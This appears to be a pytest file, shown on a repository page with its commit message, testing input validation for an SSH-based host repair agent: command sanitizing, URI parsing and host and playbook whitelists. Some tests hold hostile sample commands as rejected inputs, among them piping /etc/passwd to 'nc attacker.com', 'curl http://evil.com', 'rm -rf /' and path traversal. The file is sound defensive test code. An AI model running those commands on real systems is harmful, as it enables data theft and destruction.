Files
awoooi/apps/api/tests/test_host_repair_agent.py
OG T f8d4772abf fix(api): Sprint 3 P0-1/P0-2/P0-3/P0-4 Critical Security Fixes
P0-1: Complete shell metacharacter regex detection
  - Enhanced _SHELL_METACHAR_RE to detect: >, <, \n, ${}, $()
  - Prevents all shell injection vectors (redirects, variable expansion, newlines)
  - Added 5 new validation tests

P0-2: Add shlex.quote() protection for ansible playbook path
  - Wraps playbook_path in shlex.quote() before SSH command construction
  - Prevents shell injection if path contains special characters
  - Applied in _execute_ansible() method

P0-3: Add SSH target host whitelist validation
  - Introduces validate_ssh_target_host() function
  - Only allows SSH to: 192.168.0.110, 192.168.0.188
  - Prevents unauthorized SSH target exploitation
  - Added 5 new whitelist validation tests

P0-4: Convert HostRepairAgent to singleton pattern
  - Implements __new__() singleton with shared _in_process_locks dict
  - Ensures in-process locks persist across multiple auto_repair_service calls
  - Previously created new instance per call, making locks ineffective
  - Added singleton persistence test

Test Results: 45/45 passing (34 existing + 11 new P0 tests)
All security validations verified via comprehensive unit test coverage.

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
2026-04-07 11:09:45 +08:00

440 lines
19 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
tests/test_host_repair_agent.py
Host Repair Agent 單元測試
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
"""
import asyncio
import pytest
from unittest.mock import AsyncMock, patch
# =============================================================================
# 測試 HostRepairConfig 路由
# =============================================================================
class TestHostRepairConfig:
    """Routing checks for ``get_ssh_config_for_layer`` (layer name -> SSH user/host)."""

    @staticmethod
    def _lookup():
        """Import lazily and return ``get_ssh_config_for_layer`` itself."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        return get_ssh_config_for_layer

    def test_layer_docker_110_routes_to_110(self):
        """``docker-110`` maps to user ``wooo`` on 192.168.0.110."""
        ssh = self._lookup()("docker-110")
        assert ssh["user"] == "wooo"
        assert ssh["host"] == "192.168.0.110"

    def test_layer_docker_188_routes_to_188(self):
        """``docker-188`` maps to user ``ollama`` on 192.168.0.188."""
        ssh = self._lookup()("docker-188")
        assert ssh["user"] == "ollama"
        assert ssh["host"] == "192.168.0.188"

    def test_layer_systemd_188_routes_to_188(self):
        """``systemd-188`` maps to user ``ollama`` on 192.168.0.188."""
        ssh = self._lookup()("systemd-188")
        assert ssh["user"] == "ollama"
        assert ssh["host"] == "192.168.0.188"

    def test_unknown_layer_raises(self):
        """An unrecognised layer name is rejected with ``ValueError``."""
        resolve = self._lookup()
        with pytest.raises(ValueError, match="Unknown layer"):
            resolve("unknown-layer")

    def test_k8s_layer_raises(self):
        """The k8s layer does not go through SSH, so the lookup must raise."""
        resolve = self._lookup()
        with pytest.raises(ValueError, match="kubectl"):
            resolve("k8s")
# =============================================================================
# 測試 SSH 命令組裝
# =============================================================================
class TestSSHCommandBuilding:
    """Checks on the command string returned by ``build_repair_command``."""

    def test_repair_command_format(self):
        """A valid component yields ``repair:<component>``."""
        from src.services.host_repair_agent import build_repair_command

        assert build_repair_command("sentry") == "repair:sentry"

    def test_repair_command_component_sanitized(self):
        """Guard against command injection through the component name."""
        from src.services.host_repair_agent import build_repair_command

        malicious = "sentry; rm -rf /"
        with pytest.raises(ValueError, match="Invalid component"):
            build_repair_command(malicious)

    def test_repair_command_valid_components(self):
        """Every listed component name is accepted and formatted the same way."""
        from src.services.host_repair_agent import build_repair_command

        accepted = (
            "sentry",
            "harbor",
            "gitea",
            "openclaw",
            "gitea-runner",
            "alertmanager",
            "redis",
            "nginx",
        )
        for name in accepted:
            built = build_repair_command(name)
            assert built == f"repair:{name}"
# =============================================================================
# 測試 HostRepairAgent.repair() 路由
# =============================================================================
class TestHostRepairAgent:
    """``HostRepairAgent.repair()`` behaviour with ``_ssh_execute`` replaced by a mock."""

    @pytest.mark.asyncio
    async def test_repair_success_returns_ok(self):
        """A ``REPAIR_OK`` reply gives a successful result and one SSH call with the expected arguments."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        ssh_stub = AsyncMock(return_value="REPAIR_OK:sentry")
        with patch.object(agent, "_ssh_execute", ssh_stub):
            outcome = await agent.repair(layer="docker-110", component="sentry")

        assert outcome.success is True
        assert outcome.component == "sentry"
        assert outcome.layer == "docker-110"
        ssh_stub.assert_called_once_with(
            host="192.168.0.110",
            user="wooo",
            key_path="/etc/repair-ssh/id_ed25519",
            command="repair:sentry",
        )

    @pytest.mark.asyncio
    async def test_repair_fail_returns_failure(self):
        """A ``REPAIR_FAIL`` reply is reported as a failure carrying that text in ``error``."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        ssh_stub = AsyncMock(return_value="REPAIR_FAIL:harbor:exit_1")
        with patch.object(agent, "_ssh_execute", ssh_stub):
            outcome = await agent.repair(layer="docker-110", component="harbor")

        assert outcome.success is False
        assert "REPAIR_FAIL" in outcome.error

    @pytest.mark.asyncio
    async def test_repair_ssh_timeout_returns_failure(self):
        """An ``asyncio.TimeoutError`` from SSH becomes a failure whose error mentions a timeout."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        ssh_stub = AsyncMock(side_effect=asyncio.TimeoutError())
        with patch.object(agent, "_ssh_execute", ssh_stub):
            outcome = await agent.repair(layer="docker-110", component="sentry")

        assert outcome.success is False
        assert "timeout" in outcome.error.lower()

    @pytest.mark.asyncio
    async def test_repair_denied_returns_failure(self):
        """A ``REPAIR_DENIED`` reply is reported as a failure."""
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        ssh_stub = AsyncMock(return_value="REPAIR_DENIED:unknown_component:badcomponent")
        with patch.object(agent, "_ssh_execute", ssh_stub):
            outcome = await agent.repair(layer="docker-110", component="badcomponent")

        assert outcome.success is False
# =============================================================================
# 測試 URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
class TestParseUriCommand:
    """``parse_uri_command`` splits ``scheme://host_or_layer/payload`` URIs."""

    def test_openclaw_scheme(self):
        """``openclaw://`` URIs expose layer and component."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("openclaw://docker-110/sentry")
        assert parsed.scheme == "openclaw"
        assert parsed.host_or_layer == "docker-110"
        assert parsed.payload == "sentry"

    def test_ansible_scheme(self):
        """``ansible://`` URIs expose host and playbook name."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
        assert parsed.scheme == "ansible"
        assert parsed.host_or_layer == "192.168.0.188"
        assert parsed.payload == "vacuum_postgres.yml"

    def test_ssh_scheme(self):
        """``ssh://`` URIs keep ``user@host`` together and the command as payload."""
        from src.services.host_repair_agent import parse_uri_command

        parsed = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
        assert parsed.scheme == "ssh"
        assert parsed.host_or_layer == "wooo@192.168.0.110"
        assert parsed.payload == "docker ps"

    def test_invalid_scheme_raises(self):
        """A scheme outside the supported set is rejected."""
        from src.services.host_repair_agent import parse_uri_command

        unsupported = "http://example.com/cmd"
        with pytest.raises(ValueError, match="Unsupported scheme"):
            parse_uri_command(unsupported)

    def test_missing_payload_raises(self):
        """A URI with nothing after the trailing slash is rejected."""
        from src.services.host_repair_agent import parse_uri_command

        no_payload = "ansible://192.168.0.188/"
        with pytest.raises(ValueError, match="payload"):
            parse_uri_command(no_payload)

    def test_legacy_format_raises(self):
        """The scheme-less ``layer/component`` form is rejected as an unsupported scheme."""
        from src.services.host_repair_agent import parse_uri_command

        legacy = "docker-110/sentry"
        with pytest.raises(ValueError, match="Unsupported scheme"):
            parse_uri_command(legacy)
class TestValidateShellSafety:
    """``validate_shell_safety`` accepts plain commands and rejects risky ones."""

    def test_safe_command_passes(self):
        """A plain command is accepted (the call must not raise)."""
        from src.services.host_repair_agent import validate_shell_safety

        validate_shell_safety("docker ps")

    def test_semicolon_blocked(self):
        """``;`` command chaining is rejected."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "docker ps; rm -rf /"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_pipe_blocked(self):
        """``|`` piping is rejected."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "cat /etc/passwd | nc attacker.com 9999"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_double_ampersand_blocked(self):
        """``&&`` chaining is rejected."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "ls && curl http://evil.com"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_command_substitution_blocked(self):
        """``$(...)`` command substitution is rejected."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "echo $(id)"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_backtick_blocked(self):
        """Backtick command substitution is rejected."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "echo `id`"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_too_long_blocked(self):
        """A 513-character command is rejected as too long."""
        from src.services.host_repair_agent import validate_shell_safety

        oversized = "a" * 513
        with pytest.raises(ValueError, match="too long"):
            validate_shell_safety(oversized)
import os
from unittest.mock import patch, AsyncMock
class TestAnsibleWhitelist:
    """``validate_ansible_playbook`` against the ``ANSIBLE_PLAYBOOK_WHITELIST`` env var."""

    def test_allowed_playbook_passes(self):
        """A playbook named in the whitelist is accepted (the call must not raise)."""
        from src.services.host_repair_agent import validate_ansible_playbook

        env = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}
        with patch.dict(os.environ, env):
            validate_ansible_playbook("vacuum_postgres.yml")

    def test_disallowed_playbook_raises(self):
        """A file name missing from the whitelist is rejected."""
        from src.services.host_repair_agent import validate_ansible_playbook

        env = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}
        with patch.dict(os.environ, env):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("evil_script.sh")

    def test_path_traversal_blocked(self):
        """A ``../`` traversal path is rejected as not whitelisted."""
        from src.services.host_repair_agent import validate_ansible_playbook

        env = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}
        with patch.dict(os.environ, env):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("../../../etc/passwd")
class TestRepairByUri:
    """``HostRepairAgent.repair_by_uri`` dispatch by URI scheme."""

    @pytest.mark.asyncio
    async def test_openclaw_scheme_calls_repair(self):
        """``openclaw://`` is forwarded to ``_execute_openclaw(layer, component)``."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        canned = HostRepairResult(
            success=True,
            layer="docker-110",
            component="sentry",
            output="REPAIR_OK:sentry",
        )
        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as openclaw_stub:
            openclaw_stub.return_value = canned
            outcome = await agent.repair_by_uri("openclaw://docker-110/sentry")

        assert outcome.success is True
        openclaw_stub.assert_awaited_once_with("docker-110", "sentry")

    @pytest.mark.asyncio
    async def test_ansible_scheme_calls_ansible(self):
        """``ansible://`` is forwarded to ``_execute_ansible(host, playbook)``."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        canned = HostRepairResult(
            success=True,
            layer="ansible",
            component="vacuum_postgres.yml",
            output="REPAIR_OK:ansible",
        )
        env = {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}
        with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as ansible_stub:
            with patch.dict(os.environ, env):
                ansible_stub.return_value = canned
                outcome = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")

        assert outcome.success is True
        ansible_stub.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")

    @pytest.mark.asyncio
    async def test_ssh_scheme_blocked_without_approval_flag(self):
        """``ssh://`` without the approval flag fails with ``requires_approval`` in the error."""
        from src.services.host_repair_agent import HostRepairAgent

        outcome = await HostRepairAgent().repair_by_uri("ssh://wooo@192.168.0.110/docker ps")
        assert outcome.success is False
        assert "requires_approval" in outcome.error

    @pytest.mark.asyncio
    async def test_invalid_uri_returns_failure(self):
        """A malformed URI is returned as a failure result, not raised."""
        from src.services.host_repair_agent import HostRepairAgent

        outcome = await HostRepairAgent().repair_by_uri("bad-format")
        assert outcome.success is False
        assert "Unsupported scheme" in outcome.error
class TestAuditLog:
    """Audit-log side effect of ``HostRepairAgent.repair_by_uri``."""

    @pytest.mark.asyncio
    async def test_successful_repair_writes_audit_log(self):
        """A successful repair must invoke ``_write_audit_log`` (the AuditLog write path)."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        canned = HostRepairResult(
            success=True,
            layer="docker-110",
            component="sentry",
            output="REPAIR_OK:sentry",
        )
        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as openclaw_stub:
            with patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as audit_stub:
                openclaw_stub.return_value = canned
                outcome = await agent.repair_by_uri("openclaw://docker-110/sentry")

        assert outcome.success is True
        assert audit_stub.called, "AuditLog should be called"
        # call_args is only populated once the mock has been invoked.
        assert audit_stub.call_args is not None
class TestRepairLock:
    """In-process repair lock: concurrent repairs of one component must not both run."""

    @pytest.mark.asyncio
    async def test_duplicate_repair_is_blocked(self):
        """A second concurrent repair of the same component must be blocked by the lock."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        agent = HostRepairAgent()
        call_count = 0

        async def fake_execute_openclaw(layer, component):
            nonlocal call_count
            call_count += 1
            await asyncio.sleep(0.1)  # simulate work so the two calls overlap
            return HostRepairResult(
                success=True, layer=layer, component=component, output="REPAIR_OK:test"
            )

        with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw):
            results = await asyncio.gather(
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                return_exceptions=True,
            )

        # return_exceptions=True may put exceptions in the list; only results count.
        outcomes = [r for r in results if isinstance(r, HostRepairResult)]
        successes = [r for r in outcomes if r.success]
        blocked = [r for r in outcomes if not r.success and "already running" in r.error]
        assert len(successes) == 1
        assert len(blocked) == 1
        # The blocked call must never have reached the executor.
        assert call_count == 1, "Executor should run exactly once"

    @pytest.mark.asyncio
    async def test_singleton_lock_persistence(self):
        """P0-4: the singleton pattern must share the in-process lock across instances."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult

        # Two constructions should hand back the same object due to the singleton.
        agent1 = HostRepairAgent()
        agent2 = HostRepairAgent()
        assert agent1 is agent2, "HostRepairAgent should be singleton"
        assert agent1._in_process_locks is agent2._in_process_locks, "Locks dict should be shared"

        call_count = 0

        async def fake_execute(layer, component):
            nonlocal call_count
            call_count += 1
            await asyncio.sleep(0.05)  # simulate work so the two calls overlap
            return HostRepairResult(success=True, layer=layer, component=component, output="OK")

        # Drive both references concurrently; agent2 is agent1 (asserted above),
        # so patching agent1 covers both calls.
        with patch.object(agent1, "_execute_openclaw", side_effect=fake_execute):
            results = await asyncio.gather(
                agent1.repair_by_uri("openclaw://docker-110/test"),
                agent2.repair_by_uri("openclaw://docker-110/test"),
                return_exceptions=True,
            )

        outcomes = [r for r in results if isinstance(r, HostRepairResult)]
        successes = [r for r in outcomes if r.success]
        blocked = [r for r in outcomes if not r.success and "already running" in r.error]
        assert len(successes) == 1, "First call should succeed"
        assert len(blocked) == 1, "Second call should be blocked by shared lock"
        # The blocked call must never have reached the executor.
        assert call_count == 1, "Executor should run exactly once"
# =============================================================================
# P0-1 Tests: Enhanced shell metacharacter detection
# =============================================================================
class TestEnhancedShellMetacharDetection:
    """2026-04-06 Claude Code: Sprint 3 P0-1 Tests"""

    def test_redirect_out_blocked(self):
        """P0-1: ``>`` output redirection must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "ls > /tmp/out"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_redirect_in_blocked(self):
        """P0-1: ``<`` input redirection must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "cat < /etc/passwd"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_newline_blocked(self):
        """P0-1: a newline must be blocked (it would allow multi-line commands)."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "ls\nrm -rf /"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_dollar_brace_substitution_blocked(self):
        """P0-1: ``${`` variable expansion must be blocked."""
        from src.services.host_repair_agent import validate_shell_safety

        payload = "echo ${PATH}"
        with pytest.raises(ValueError, match="Shell metacharacter"):
            validate_shell_safety(payload)

    def test_safe_simple_command_passes(self):
        """P0-1: a simple command must pass (the call must not raise)."""
        from src.services.host_repair_agent import validate_shell_safety

        validate_shell_safety("docker ps")
# =============================================================================
# P0-3 Tests: SSH target host whitelist
# =============================================================================
class TestSSHTargetWhitelist:
    """2026-04-06 Claude Code: Sprint 3 P0-3 Tests"""

    def test_allowed_host_110_passes(self):
        """P0-3: 192.168.0.110 is whitelisted and must pass (no exception)."""
        from src.services.host_repair_agent import validate_ssh_target_host

        validate_ssh_target_host("192.168.0.110")

    def test_allowed_host_188_passes(self):
        """P0-3: 192.168.0.188 is whitelisted and must pass (no exception)."""
        from src.services.host_repair_agent import validate_ssh_target_host

        validate_ssh_target_host("192.168.0.188")

    def test_unauthorized_host_blocked(self):
        """P0-3: a host outside the whitelist must be blocked."""
        from src.services.host_repair_agent import validate_ssh_target_host

        outsider = "192.168.0.999"
        with pytest.raises(ValueError, match="not in allowed whitelist"):
            validate_ssh_target_host(outsider)

    def test_localhost_blocked(self):
        """P0-3: localhost must be blocked."""
        from src.services.host_repair_agent import validate_ssh_target_host

        loopback = "127.0.0.1"
        with pytest.raises(ValueError, match="not in allowed whitelist"):
            validate_ssh_target_host(loopback)

    @pytest.mark.asyncio
    async def test_ssh_scheme_with_unauthorized_host_fails(self):
        """P0-3: an ``ssh://`` URI aimed at an unauthorized host must fail, even when approved."""
        from src.services.host_repair_agent import HostRepairAgent

        outcome = await HostRepairAgent().repair_by_uri(
            "ssh://wooo@192.168.0.999/ls", approved=True
        )
        assert outcome.success is False
        assert "not in allowed whitelist" in outcome.error